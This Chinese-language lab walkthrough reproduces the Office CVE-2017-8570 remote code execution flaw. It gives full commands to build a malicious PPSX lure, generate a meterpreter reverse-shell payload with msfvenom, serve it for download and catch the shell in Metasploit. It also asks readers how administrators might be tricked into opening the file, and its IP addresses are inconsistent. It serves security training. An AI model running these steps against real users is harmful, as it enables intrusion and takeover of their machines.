2. 程式人生 > >Office CVE-2017-8570遠程代碼執行漏洞復現

Office CVE-2017-8570遠程代碼執行漏洞復現

阿新 發佈:2017-08-25
pytho pack root 一個 strong -o 激活 meta 相同

實驗環境

  • 操作機:Kali Linux IP:172.16.11.2
  • 目標機:windows7 x64 IP:172.16.12.2

實驗目的

  • 掌握漏洞的利用方法

實驗工具

  • Metaspliot:它是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程,團隊合作。

實驗內容

Office CVE-2017-8570

CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm(沙蟲)漏洞非常類似,因此我們稱之為“沙蟲”二代漏洞:Office全家桶

漏洞介紹

OfficeCVE-2017-85702017年7月,微軟在例行的閱讀補丁中修復了多個Microsoft Office漏洞,其中的CVE-2017-8570漏洞為一個邏輯漏洞,利用方法簡單。網上公布了利用代碼影響範圍廣泛。該漏洞為Microsoft Office的一個遠程代碼執行漏洞。

其成因是Microsof PowerPoint執行時會初始化“script”Moniker對象,而在PowerPoint播放動畫期間會激活該對象,從而執行sct腳本(Windows script Component)文件。攻擊這可以欺騙用戶運行含有該漏洞的PPT文件導致獲取和當前登錄用戶相同的執行權限。

影響版本

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)

實驗步驟

步驟1:生成惡意的PPSX文件

我們首先使用Xshell連接Kali機器,點擊桌面Xshell圖標,輸入IP:172.16.12.2,賬號為:root 密碼:123456 ,如圖:

技術分享

首先我們在Kali中執行如下命令:

cd  CVE-2017-8570       //進入exploit的目錄

python cve-2017-8570_toolkit.py  -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc       //生成ppsx惡意文件

技術分享

使用ls命令,可以看到已經成功生成了ppsx格式文件。

技術分享

接下來我們生成惡意PPSX文件通過調用Powershell下載並執行的反彈木馬。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe

其中 -p 參數是 payload的意思,使用的windows的meterpreter的反彈木馬-f參數 指定輸出文件後綴為exe文件再用>重定向輸出到tmp目錄下

技術分享

接下來輸入如下命令:

python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe

這段命令是通過腳本在80端口監聽,等待接收ppsx請求並下載執行我們的反彈木馬

技術分享

接下來進入Metasploit,新建一個Kali`172.16.12.2的連接,設置相關參數,接受返回的Shell

msfconsole
use multi/handler   //使用監聽模塊
set payload windows/meterpreter/reverse_tcp    //設置Payload
set LHOST 172.16.12.2   //設置本地接收IP
run

技術分享

可以看到我們的Metaspliot已經在本地開啟監聽

到此我們的所有準備都做好,下一步我們模擬用戶點擊惡意文件

步驟2:目標機器執行惡意PPSX文件

我們使用桌面Xftp軟件,連接上目標機172.16.12.2,將Invoice.ppsx文件拖到當前桌面上。

技術分享

如圖,他是一個PPT文件,我們模擬用戶雙擊打開它。

技術分享

技術分享

執行過程中可以看到代碼通過調用powershell在遠程下載執行我們的惡意木馬,此時已經反彈回了shell

技術分享

使用命令:

getuid     //獲取當前用戶ID

技術分享

這樣就獲取了目標機器的權限,可以通過Metasploit去執行命令。

實驗結果分析與總結

Office一直是主流的辦公軟件,CVE-2017-8570這個漏洞影響office所有發行版本,當用戶不經意點擊了我們的惡意PPSX文件,那麽我們就可以直接獲取到他的用戶權限,可以看到危害性十分高。

修復方案:

補丁地址https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

思考

  • 請思考,我們可以用什麽方式誘發管理員觸發這個漏洞?

Office CVE-2017-8570遠程代碼執行漏洞復現

相關推薦

Office CVE-2017-8570執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Office CVE-2017-8570 執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

Apache Tomcat CVE-2017-12615執行漏洞分析

文件 only html ive zip pre clas one 判斷 2017年9月19日, Apache Tomcat官方發布兩個嚴重的安全漏洞, 其中CVE-2017-12615為遠程代碼執行漏洞,通過put請求向服務器上傳惡意jsp文件, 再通過jsp文件在服

LNK文件(快捷方式)執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

[工具]Tomcat CVE-2017-12615 執行

win 博客 work frame pan cat .com toc 文件 工具: K8_TocmatExp編譯: VS2012 C# (.NET Framework v2.0)組織: K8搞基大隊[K8team]作者: K8拉登哥哥博客: http://qqhack8.

Nexus Repository Manager 3(CVE-2019-7238) 執行漏洞分析和復現

下載鏈接 例子 conf bash 動態 本地 簡單的 article detail 0x00 漏洞背景 Nexus Repository Manager 3是一款軟件倉庫,可以用來存儲和分發Maven,NuGET等軟件源倉庫。其3.14.0及之前版本中,存在一處基於Or

St2-057執行漏洞復現過程

noop tasks res tar legacy roo struts 2 pri err 0x01 搭建環境docker https://github.com/vulhub/vulhub/tree/master/struts2/s2-048 docker-compos

ECShop全系列版本執行漏洞復現

eval 解析變量 width xtra assert attr 執行 assign select 前言 問題發生在user.php的display函數,模版變量可控,導致註入,配合註入可達到遠程代碼執行 漏洞分析 0x01-SQL註入 先看user.php $bac

ghostscript執行漏洞復現

centos7 gate ibm batch otl htm 報錯 驗證 分享 這兩天網上ghostscript又又有漏洞信息了,但是沒有poc,於是找找資料把今年8月21日的那個驗證下 1、關於ghostscript Ghostscript是一套建基於Adobe、Post

Office執行漏洞CVE-2017-0199復現

read 方式 觀察 data n3k -s 執行 rip 最大限度 在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這

隱藏17年的Office執行漏洞CVE-2017-11882)

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

Microsoft Edge 瀏覽器執行漏洞POC及細節(CVE-2017-8641)

ive buffer png serer virt pil binding nproc mil 2017年8月8日,CVE官網公布了CVE-2017-8641,在其網上的描述為: 意思是說,黑客可以通過在網頁中嵌入惡意構造的javascript代碼,使得微軟的瀏覽器(如E

Samba執行漏洞(CVE-2017-7494)復現

one hub 4.6 修改配置 自己 tree bpa wid 找到   簡要記錄一下Samba遠程代碼執行漏洞(CVE-2017-7494)環境搭建和利用的過程,獻給那些想自己動手搭建環境的朋友。(雖然已過多時)   快捷通道:Docker ~ Samba遠程代碼

Samba執行漏洞CVE-2017-7494) 復現

51cto ucc 協議 samba配置文件 finished arc tin epo type 漏洞背景:Samba是在Linux和UNIX系統上實現SMB協議的一個軟件,2017年5月24日Samba發布了4.6.4版本,中間修復了一個嚴重的遠程代碼執行漏洞,漏洞編號C

PHPMailer < 5.2.18 執行漏洞CVE-2016-10033)

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

WebLogic 任意文件上傳 執行漏洞CVE-2018-2894)------->>>任意文件上傳檢測POC

htm input ade print out vcg exc ops 上傳 前言: Oracle官方發布了7月份的關鍵補丁更新CPU(Critical Patch Update),其中針對可造成遠程代碼執行的高危漏洞 CVE-2018-2894 進行修復: http:

Chrome 執行漏洞CVE-2019-5786-EXP

代碼執行 一個 art eas 避免 返回 class 參考 release 0x01 漏洞原理 CVE-2019-5786是位於FileReader中的UAF漏洞,由Google’s Threat Analysis Group的Clement Lecigne於2019-0

Jenkins執行漏洞

查看 過程 com 漏洞 all 用戶 運行 最新 style 於一個月前,進行服務器巡檢時,發現服務器存在不明進程,並且以Jenkins用戶身份來運行.當時進行了處理並修復了漏洞.在此補上修復過程 第一反應是Jenkins存在漏洞,於是Google Jenkins漏洞,瞬

http.sys執行漏洞(MS15-034)

bsp 描述 style windows zh-cn port c代碼 win pan 0x01漏洞描述 遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者

OrientDB執行漏洞利用與分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼